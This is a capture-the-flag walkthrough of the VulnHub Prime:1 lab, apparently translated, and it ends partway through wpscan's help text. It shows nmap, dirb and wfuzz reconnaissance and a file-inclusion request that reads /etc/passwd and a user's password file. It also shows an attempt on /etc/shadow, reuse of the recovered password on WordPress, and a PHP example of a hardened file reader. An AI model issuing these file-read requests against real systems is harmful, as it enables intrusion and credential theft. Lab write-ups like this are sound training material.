Penetration workflow
Get the target machine address: //www.vulnhub.com/entry/prime-1,358/
Host discovery: the network's /24 (class C) segment
Use Nmap to scan the target's /24 segment
┌──(root㉿kali)-[~]
└─# nmap -sP 192.168.216.1/24
Starting Nmap 7.92 ( //nmap.org ) at 2022-11-05 13:54 CST
Nmap scan report for 192.168.216.1 # can be ignored
Host is up (0.000088s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 192.168.216.2 # can be ignored
Host is up (0.00060s latency).
MAC Address: 00:50:56:FA:F2:EA (VMware)
Nmap scan report for 192.168.216.151
Host is up (0.000090s latency).
MAC Address: 00:0C:29:B7:68:78 (VMware)
Nmap scan report for 192.168.216.254 # can be ignored
Host is up (0.00021s latency).
MAC Address: 00:50:56:F4:FA:7B (VMware)
Nmap scan report for 192.168.216.128 # Kali's IP
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 27.96 seconds
That leaves only two machines (Kali and the target)
Confirm 192.168.216.151 as the target's IP
Port scanning
Scanning the host's ports tells us which services are running on it
# full / comprehensive scan
┌──(root㉿kali)-[~]
└─# nmap -A 192.168.216.151
Starting Nmap 7.92 ( //nmap.org ) at 2022-11-05 14:28 CST
Nmap scan report for 192.168.216.151
Host is up (0.00050s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 8d:c5:20:23:ab:10:ca:de:e2:fb:e5:cd:4d:2d:4d:72 (RSA)
| 256 94:9c:f8:6f:5c:f1:4c:11:95:7f:0a:2c:34:76:50:0b (ECDSA)
|_ 256 4b:f6:f1:25:b6:13:26:d4:fc:9e:b0:72:9f:f4:69:68 (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-title: HacknPentest
|_http-server-header: Apache/2.4.18 (Ubuntu)
MAC Address: 00:0C:29:B7:68:78 (VMware)
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.2 - 4.9
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE
HOP RTT ADDRESS
1 0.50 ms 192.168.216.151
OS and Service detection performed. Please report any incorrect results at //nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 21.41 seconds
The host has two ports open: 22 (ssh) and 80 (Apache)
Let's visit port 80 and see what website is deployed there
Directory scanning
We can run a directory scan to look at the site's subdirectories and check for sensitive directories or files
Using dirb
You can use Yujian (御剑) or another tool; the dirb tool that ships with Kali also works
#man dirb
DIRB(1) General Commands Manual DIRB(1)
NAME
dirb - Web Content Scanner
SYNOPSIS
dirb <url_base> <url_base> [<wordlist_file(s)>] [options]
DESCRIPTION
DIRB IS a Web Content Scanner. It looks for existing (and/or hidden) Web Objects. It basically works by launching a dictionary basesd attack against a web server and analizing the response.
OPTIONS
-a <agent_string>
Specify your custom USER_AGENT. (Default is: "Mozilla/4.0 (compatible; MSIE 6.0;
Windows NT 5.1)")
-b Don't squash or merge sequences of /../ or /./ in the given URL.
-c <cookie_string>
Set a cookie for the HTTP request.
-E <certificate>
Use the specified client certificate file.
-f Fine tunning of NOT_FOUND (404) detection.
-H <header_string>
Add a custom header to the HTTP request.
-i Use case-insensitive Search.
-l Print "Location" header when found.
-N <nf_code>
Ignore responses with this HTTP code.
-o <output_file>
Save output to disk.
-p <proxy[:port]>
Use this proxy. (Default port is 1080)
-P <proxy_username:proxy_password>
Proxy Authentication.
-r Don't Search Recursively.
-R Interactive Recursion. (Ask in which directories you want to scan)
-S Silent Mode. Don't show tested words. (For dumb terminals)
-t Don't force an ending '/' on URLs.
-u <username:password>
Username and password to use.
-v Show Also Not Existent Pages.
-w Don't Stop on WARNING messages.
-x <extensions_file>
Amplify search with the extensions on this file.
-X <extensions>
Amplify search with this extensions.
-z <milisecs>
Amplify search with this extensions.
SEE ALSO
┌──(root㉿kali)-[~]
└─# dirb //192.168.216.151
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 5 15:30:57 2022
URL_BASE: //192.168.216.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
-----------------
GENERATED WORDS: 4612
---- Scanning URL: //192.168.216.151/ ----
+ //192.168.216.151/dev (CODE:200|SIZE:131) #*
+ //192.168.216.151/index.php (CODE:200|SIZE:136) # the page we saw
==> DIRECTORY: //192.168.216.151/javascript/
+ //192.168.216.151/server-status (CODE:403|SIZE:280)
==> DIRECTORY: //192.168.216.151/wordpress/ #*
---- Entering directory: //192.168.216.151/javascript/ ----
==> DIRECTORY: //192.168.216.151/javascript/jquery/
---- Entering directory: //192.168.216.151/wordpress/ ----
+ //192.168.216.151/wordpress/index.php (CODE:301|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/
==> DIRECTORY: //192.168.216.151/wordpress/wp-includes/
+ //192.168.216.151/wordpress/xmlrpc.php (CODE:405|SIZE:42)
---- Entering directory: //192.168.216.151/javascript/jquery/ ----
+ //192.168.216.151/javascript/jquery/jquery (CODE:200|SIZE:284394)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/ ----
+ //192.168.216.151/wordpress/wp-admin/admin.php (CODE:302|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/css/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/images/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/includes/
+ //192.168.216.151/wordpress/wp-admin/index.php (CODE:302|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/js/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/maint/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/network/
==> DIRECTORY: //192.168.216.151/wordpress/wp-admin/user/
---- Entering directory: //192.168.216.151/wordpress/wp-content/ ----
+ //192.168.216.151/wordpress/wp-content/index.php (CODE:200|SIZE:0)
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/plugins/
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/themes/
==> DIRECTORY: //192.168.216.151/wordpress/wp-content/uploads/
---- Entering directory: //192.168.216.151/wordpress/wp-includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/css/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/images/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/includes/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/js/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/maint/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/network/ ----
+ //192.168.216.151/wordpress/wp-admin/network/admin.php (CODE:302|SIZE:0)
+ //192.168.216.151/wordpress/wp-admin/network/index.php (CODE:302|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-admin/user/ ----
+ //192.168.216.151/wordpress/wp-admin/user/admin.php (CODE:302|SIZE:0)
+ //192.168.216.151/wordpress/wp-admin/user/index.php (CODE:302|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-content/plugins/ ----
+ //192.168.216.151/wordpress/wp-content/plugins/index.php (CODE:200|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-content/themes/ ----
+ //192.168.216.151/wordpress/wp-content/themes/index.php (CODE:200|SIZE:0)
---- Entering directory: //192.168.216.151/wordpress/wp-content/uploads/ ----
(!) WARNING: Directory IS LISTABLE. No need to scan it.
(Use mode '-w' if you want to scan it anyway)
-----------------
END_TIME: Sat Nov 5 15:31:35 2022
DOWNLOADED: 46120 - FOUND: 15
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/dev
hello,
now you are at level 0 stage.
In real life pentesting we should use our tools to dig on a web very hard.
Happy hacking.
Narrow the scope: set extensions and look only for .txt, .zip and .php files
┌──(root㉿kali)-[~]
└─# dirb //192.168.216.151 -X .txt,.zip,.php
-----------------
DIRB v2.22
By The Dark Raver
-----------------
START_TIME: Sat Nov 5 15:42:46 2022
URL_BASE: //192.168.216.151/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
EXTENSIONS_LIST: (.txt,.zip,.php) | (.txt)(.zip)(.php) [NUM = 3]
-----------------
GENERATED WORDS: 4612
---- Scanning URL: //192.168.216.151/ ----
+ //192.168.216.151/image.php (CODE:200|SIZE:147) # this file is nearly identical to the page source we saw ****
+ //192.168.216.151/index.php (CODE:200|SIZE:136) # the page source we saw
+ //192.168.216.151/secret.txt (CODE:200|SIZE:412)
-----------------
END_TIME: Sat Nov 5 15:42:55 2022
DOWNLOADED: 13836 - FOUND: 3
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/secret.txt
Looks like you have got some secrets.
Ok I just want to do some help to you.
Do some more fuzz on every page of php which was finded by you. And if
you get any right parameter then follow the below steps. If you still stuck
Learn from here a basic tool with good usage for OSCP.
# use a fuzzing tool to dig further into the two php files
//github.com/hacknpentest/Fuzzing/blob/master/Fuzz_For_Web
# tool address
//see the location.txt and you will get your next move//
# hint: once we see the file location.txt we can move on to the next step
Parameter brute-forcing
Using fuzzing
Fuzz testing: use fuzzing to find the parameters this page accepts
For example: //192.168.216.151/image.php?FUZZ=location.txt
What fuzzing is used for:
finding parameters
SQL injection
password brute-forcing
- username known, password unknown
- neither username nor password known
WAF bypass
Here we use the tool that ships with Kali: wfuzz
Using wfuzz
┌──(root㉿kali)-[~]
└─# wfuzz -h
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
* *
* Version up to 1.4c coded by: *
* Christian Martorella ([email protected]) *
* Carlos del ojo ([email protected]) *
* *
* Version 1.4d to 3.1.0 coded by: *
* Xavier Mendez ([email protected]) *
********************************************************
Usage: wfuzz [options] -z payload,params <url>
FUZZ, ..., FUZnZ wherever you put these keywords wfuzz will replace them with the values of the specified payload.
FUZZ{baseline_value} FUZZ will be replaced by baseline_value. It will be the first request performed and could be used as a base for filtering.
Options:
-h : This help
--help : Advanced help
--version : Wfuzz version details
-e <type> : List of available encoders/payloads/iterators/printers/scripts
-c : Output with colors
-v : Verbose information. # verbose output
--interact : (beta) If selected,all key presses are captured. This allows you to interact with the program. # if selected, all key presses are captured, letting you interact with the program
-p addr : Use Proxy in format ip:port:type. Repeat option for using various proxies.
Where type could be SOCKS4,SOCKS5 or HTTP if omitted.
-t N : Specify the number of concurrent connections (10 default)
-s N : Specify time delay between requests (0 default)
-R depth : Recursive path discovery being depth the maximum recursion level (0 default)
-D depth : Maximum link depth level (4 default)
-L, --follow : Follow HTTP redirections
-u url : Specify a URL for the request.
-z payload : Specify a payload for each FUZZ keyword used in the form of type,parameters,encoder.
A list of encoders can be used, ie. md5-sha1. Encoders can be chained, ie. md5@sha1.
Encoders category can be used. ie. url
Use help as a payload to show payload plugin's details (you can filter using --slice)
-w wordlist : Specify a wordlist file (alias for -z file,wordlist).
-V alltype : All parameters bruteforcing (allvars and allpost). No need for FUZZ keyword.
-X method : Specify an HTTP method for the request, ie. HEAD or FUZZ
-b cookie : Specify a cookie for the requests
-d postdata : Use post data (ex: "id=FUZZ&catalogue=1")
-H header : Use header (ex:"Cookie:id=1312321&user=FUZZ")
--basic/ntlm/digest auth : in format "user:pass" or "FUZZ:FUZZ" or "domain\FUZ2Z:FUZZ"
--hc/hl/hw/hh N[,N]+ : Hide responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--sc/sl/sw/sh N[,N]+ : Show responses with the specified code/lines/words/chars (Use BBB for taking values from baseline)
--ss/hs regex : Show/Hide responses with the specified regex within the content
┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u //192.168.216.151/index.php?FUZZ -c
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: //192.168.216.151/index.php?FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 200 7 L 12 W 136 Ch "@"
000000050: 200 7 L 12 W 136 Ch "agent"
000000003: 200 7 L 12 W 136 Ch "01"
000000015: 200 7 L 12 W 136 Ch "2001"
000000031: 200 7 L 12 W 136 Ch "action"
000000007: 200 7 L 12 W 136 Ch "10"
000000049: 200 7 L 12 W 136 Ch "adsl"
000000045: 200 7 L 12 W 136 Ch "adminlogon"
000000040: 200 7 L 12 W 136 Ch "administration"
.... many more follow and the output is hard to read, so apply a filter
-w specifies the wordlist that ships with Kali's wfuzz; -u (the URL) may be omitted; --hw 12 hides responses with 12 words
┌──(root㉿kali)-[~]
└─# wfuzz -w /usr/share/wfuzz/wordlist/general/common.txt -u //192.168.216.151/index.php?FUZZ -c --hw 12
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: //192.168.216.151/index.php?FUZZ
Total requests: 951
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000341: 200 7 L 19 W 206 Ch "file"
Total time: 0
Processed Requests: 951
Filtered Requests: 950
Requests/sec.: 0
We can confirm that a `file` parameter exists
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/index.php?file=
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>you are digging wrong file</html>
The parameter exists, but we don't know which file to request; let's use the location.txt hinted at above
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/index.php?file=location.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
Do something better <br><br><br><br><br><br>ok well Now you reah at the exact parameter <br><br>Now dig some more for next one <br>use 'secrettier360' parameter on some other php page for more fun.
</html>
The file parameter is only a stepping stone; the real parameter is 'secrettier360'
Request both php files again with this parameter added
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/index.php?secrettier360=
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" />
</body>
</html>
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>
This parameter can read arbitrary files on the system
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=/etc/passwd
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-timesync:x:100:102:systemd Time Synchronization,,,:/run/systemd:/bin/false
systemd-network:x:101:103:systemd Network Management,,,:/run/systemd/netif:/bin/false
systemd-resolve:x:102:104:systemd Resolver,,,:/run/systemd/resolve:/bin/false
systemd-bus-proxy:x:103:105:systemd Bus Proxy,,,:/run/systemd:/bin/false
syslog:x:104:108::/home/syslog:/bin/false
_apt:x:105:65534::/nonexistent:/bin/false
messagebus:x:106:110::/var/run/dbus:/bin/false
uuidd:x:107:111::/run/uuidd:/bin/false
lightdm:x:108:114:Light Display Manager:/var/lib/lightdm:/bin/false
whoopsie:x:109:117::/nonexistent:/bin/false
avahi-autoipd:x:110:119:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
avahi:x:111:120:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
dnsmasq:x:112:65534:dnsmasq,,,:/var/lib/misc:/bin/false
colord:x:113:123:colord colour management daemon,,,:/var/lib/colord:/bin/false
speech-dispatcher:x:114:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/false
hplip:x:115:7:HPLIP system user,,,:/var/run/hplip:/bin/false
kernoops:x:116:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
pulse:x:117:124:PulseAudio daemon,,,:/var/run/pulse:/bin/false
rtkit:x:118:126:RealtimeKit,,,:/proc:/bin/false
saned:x:119:127::/var/lib/saned:/bin/false
usbmux:x:120:46:usbmux daemon,,,:/var/lib/usbmux:/bin/false
victor:x:1000:1000:victor,,,:/home/victor:/bin/bash
mysql:x:121:129:MySQL Server,,,:/nonexistent:/bin/false
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
sshd:x:122:65534::/var/run/sshd:/usr/sbin/nologin
</html>
Linux password hashes are stored in /etc/shadow
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=/etc/shadow
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br></html>
We can't read it here, but the second-to-last line of /etc/passwd:
saket:x:1001:1001:find password.txt file in my directory:/home/saket:
is one of the system's login users, and its comment field points at a file:
Let's look at that file, password.txt
┌──(root㉿kali)-[~]
└─# curl //192.168.216.151/image.php?secrettier360=/home/saket/password.txt
<html>
<title>HacknPentest</title>
<body>
<img src='hacknpentest.png' alt='hnp security' width="1300" height="595" /></p></p></p>
</body>
finaly you got the right parameter<br><br><br><br>follow_the_ippsec
</html>
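The write-up never shows the source of image.php, so the vulnerable function below is an added, hypothetical reconstruction of the behaviour observed with secrettier360 (the request value is used directly as a file path), placed next to a hardened version that only serves allow-listed names resolved under one fixed directory. This is example code written for this page, not taken from the box or the write-up; the directory and file names in the demo are constructed.

```php
<?php
// Added example. serve_file_vulnerable() mirrors what the box's image.php
// appears to do: the value of ?secrettier360= is read and echoed verbatim,
// which is why /etc/passwd and /home/saket/password.txt came back above.
// This is a reconstruction, not the real image.php source.

// VULNERABLE: the request parameter becomes the filesystem path as-is.
function serve_file_vulnerable(string $param): string
{
    return (string) @file_get_contents($param);
}

// HARDENED: only plain file names matching an allow-list are accepted, the
// file must live under $baseDir, and the *resolved* path is checked to still
// be inside that directory (this defeats ../ sequences, absolute paths and
// symlinks pointing elsewhere).
function serve_file_hardened(string $param, string $baseDir): ?string
{
    // 1. Syntactic allow-list: no '/', no '..', no NUL, fixed extensions only.
    if (!preg_match('/\A[A-Za-z0-9_-]{1,64}\.(txt|png|jpg)\z/', $param)) {
        return null;
    }
    // 2. Resolve both paths; realpath() returns false if the file is missing.
    $base   = realpath($baseDir);
    $target = realpath($baseDir . DIRECTORY_SEPARATOR . $param);
    if ($base === false || $target === false) {
        return null;
    }
    // 3. Containment check: the resolved target must start with "<base>/".
    if (strncmp($target, $base . DIRECTORY_SEPARATOR, strlen($base) + 1) !== 0) {
        return null;
    }
    return (string) file_get_contents($target);
}

// Self-contained demo: a temporary directory with one allowed file
// (constructed for this example), exercised with the inputs used above.
function demo(): array
{
    $dir = sys_get_temp_dir() . '/lfi_demo_' . getmypid();
    @mkdir($dir, 0700);
    file_put_contents($dir . '/location.txt', "allowed content\n");

    $results = [
        'vuln_reads_passwd'   => serve_file_vulnerable('/etc/passwd') !== '',
        'hard_blocks_passwd'  => serve_file_hardened('/etc/passwd', $dir) === null,
        'hard_blocks_dotdot'  => serve_file_hardened('../../etc/passwd', $dir) === null,
        'hard_serves_allowed' => serve_file_hardened('location.txt', $dir) === "allowed content\n",
    ];

    unlink($dir . '/location.txt');
    rmdir($dir);
    return $results;
}

foreach (demo() as $check => $ok) {
    printf("%-20s %s\n", $check, $ok ? 'ok' : 'FAIL');
}
```

Run with `php lfi_demo.php` on a Linux host; every line should print `ok`, with the first line confirming that the naive version really does hand out /etc/passwd.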
Is this follow_the_ippsec
the password?
Let's try logging in over ssh
┌──(root㉿kali)-[~]
└─# ssh -p 22 [email protected]
The authenticity of host '192.168.216.151 (192.168.216.151)' can't be established.
ED25519 key fingerprint is SHA256:j4BjjDNA4iDRgwl0m3uHtlNdQm8M97LMWuNBsgHbxt0.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.216.151' (ED25519) to the list of known hosts.
[email protected]'s password:
Permission denied, please try again.
So it is not user victor's password
But the directory scan also turned up WordPress; could it be the WordPress password?
Visit: //192.168.216.151/wordpress/wp-admin
Username: victor Password: follow_the_ippsec, log in
Login successful
Had we not known the username, we could use fingerprinting to see whether WordPress user information can be collected
Fingerprinting
Using cmseek
Use Kali's cmseek fingerprinting tool to check whether usernames can be collected from this site
___ _ _ ____ ____ ____ _ _
| |\/| [__ |___ |___ |_/ by @r3dhax0r
|___ | | ___| |___ |___ | \_ Version 1.1.3 K-RONA
[+] Deep Scan Results [+]
┏━Target: 192.168.216.151
┃
┠── CMS: WordPress
┃ │
┃ ├── Version: 5.2.2
┃ ╰── URL: //wordpress.org
┃
┠──[WordPress Deepscan]
┃ │
┃ ├── Readme file found: //192.168.216.151/wordpress//readme.html
┃ ├── License file: //192.168.216.151/wordpress//license.txt
┃ ├── Changelog: //codex.wordpress.org/Version_5.2.2
┃ │
┃ ├── Themes Enumerated: 1
┃ │ │
┃ │ ╰── Theme: twentynineteen
┃ │ │
┃ │ ├── Version: 1.4
┃ │ ╰── URL: //192.168.216.151/wordpress//wp-content/themes/twentynineteen
┃ │
┃ ╰── Version vulnerabilities: 7
┃ │
┃ │
┃ ├── WordPress before 5.2.3 allows XSS in post previews by authenticated users.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CVE-2019-16223
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 has an issue with URL sanitization in wp_kses_bad_protocol_once in wp-includes/kses.php that can lead to cross-site scripting (XSS) attacks.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //github.com/WordPress/WordPress/commit/30ac67579559fe42251b5a9f887211bf61a8ed68
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //core.trac.wordpress.org/changeset/45997
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 allows reflected XSS in the dashboard.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//core.trac.wordpress.org/changeset/45997
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── In WordPress before 5.2.3, validation and sanitization of a URL in wp_validate_redirect in wp-includes/pluggable.php could lead to an open redirect.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //core.trac.wordpress.org/changeset/45971
┃ │ ├── Reference: //github.com/WordPress/WordPress/commit/c86ee39ff4c1a79b93c967eb88522f5c09614a28
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 allows XSS in shortcode previews.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //fortiguard.com/zeroday/FG-VD-18-165
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ├── WordPress before 5.2.3 allows XSS in stored comments.
┃ │ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-//wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ │ ╰── Fixed In Version: N/A
┃ │
┃ ╰── WordPress before 5.2.3 allows XSS in media uploads because wp_ajax_upload_attachment is mishandled.
┃ ├── CVE: //cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-CVE-2019-16217
┃ ├── Reference: //core.trac.wordpress.org/changeset/45936
┃ ├── Reference: //wordpress.org/news/2019/09/wordpress-5-2-3-security-and-maintenance-release/
┃ ╰── Fixed In Version: N/A
┃
┠── Result: /usr/share/cmseek/Result/192.168.216.151_wordpress/cms.json
┃
┗━Scan Completed in 6.11 Seconds, using 45 Requests
This prints fingerprint information about WordPress's vulnerabilities, but not the username information we need. cmseek can in fact find user information;
it just did not find any here, but in most cases it does
Using wpscan
WPSCAN(1) User Commands WPSCAN(1)
NAME
wpscan - WordPress Security Scanner
SYNOPSIS
wpscan [options]
DESCRIPTION
WordPress Security Scanner by the WPScan Team
Sponsored by Sucuri - //sucuri.net
@_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
OPTIONS
--url URL
The URL of the blog to scan Allowed Protocols: http, https Default Protocol if none provided: http This option is mandatory unless update or help or hh or version is/are supplied
-h, --help
Display the simple help and exit
--hh Display the full help and exit
--version
Display the version and exit
-v, --verbose
Verbose mode
--[no-]banner
Whether or not to display the banner Default: true
-o, --output FILE
Output to FILE
-f, --format FORMAT
Output results in the format supplied Available choices: cli-no-colour, cli-no-color, json, cli
--detection-mode MODE
Default: mixed Available choices: mixed, passive, aggressive
--user-agent, --ua VALUE
--random-user-agent, --rua
Use a random user-agent for each scan
--http-auth login:password
-t, --max-threads VALUE
The max threads to use Default: 5
--throttle MilliSeconds
Milliseconds to wait before doing another web request. If used, the max threads will be set to 1.
--request-timeout SECONDS
The request timeout in seconds Default: 60
--connect-timeout SECONDS
The connection timeout in seconds Default: 30
--disable-tls-checks
Disables SSL/TLS certificate verification
--proxy protocol://IP:port
Supported protocols depend on the cURL installed
--proxy-auth login:password
--cookie-string COOKIE
Cookie string to use in requests, format: cookie1=value1[; cookie2=value2]
--cookie-jar FILE-PATH
File to read and write cookies Default: /tmp/wpscan/cookie_jar.txt
--force
Do not check if the target is running WordPress
--[no-]update
Whether or not to update the Database
--wp-content-dir DIR
--wp-plugins-dir DIR
-e, --enumerate [OPTS]
Enumeration Process Available Choices:
vp Vulnerable plugins
ap All plugins
p Plugins
vt Vulnerable themes
at All themes
t Themes
tt Timthumbs
cb Config backups
dbe Db exports
u User IDs range. e.g: u1-5 Range separator to use: '-' Value if no argument supplied: 1-10
m Media IDs range. e.g m1-15 Note: Permalink setting must be set to "Plain" for those to be detected Range separator to use: '-' Value if no argument supplied: 1-100
Separator to use between the values: ',' Default: All Plugins, Config Backups Value if no argument supplied: vp,vt,tt,cb,dbe,u,m Incompatible choices (only one of each group/s can be used):
- vp, ap, p - vt, at, t
--exclude-content-based REGEXP_OR_STRING
Exclude all responses matching the Regexp (case insensitive) during parts of the enumeration. Both the headers and body are checked. Regexp delimiters are not required.
--plugins-detection MODE
Use the supplied mode to enumerate Plugins, instead of the global (--detection-mode) mode. Default: passive Available choices: mixed, passive, aggressive
--plugins-version-detection MODE
Use the supplied mode to check plugins versions instead of the --detection-mode or --plugins-detection modes. Default: mixed Available choices: mixed, passive, aggressive
-P, --passwords FILE-PATH
List of passwords to use during the password attack. If no --username/s option supplied, user enumeration will be run.
-U, --usernames LIST
List of usernames to use during the password attack. Examples: 'a1', 'a1,a2,a3', '/tmp/a.txt'
--multicall-max-passwords MAX_PWD
Maximum number of passwords to send by request with XMLRPC multicall Default: 500
--password-attack ATTACK
Force the supplied attack to be used rather than automatically determining one. Available choices: wp-login, xmlrpc, xmlrpc-multicall
--stealthy
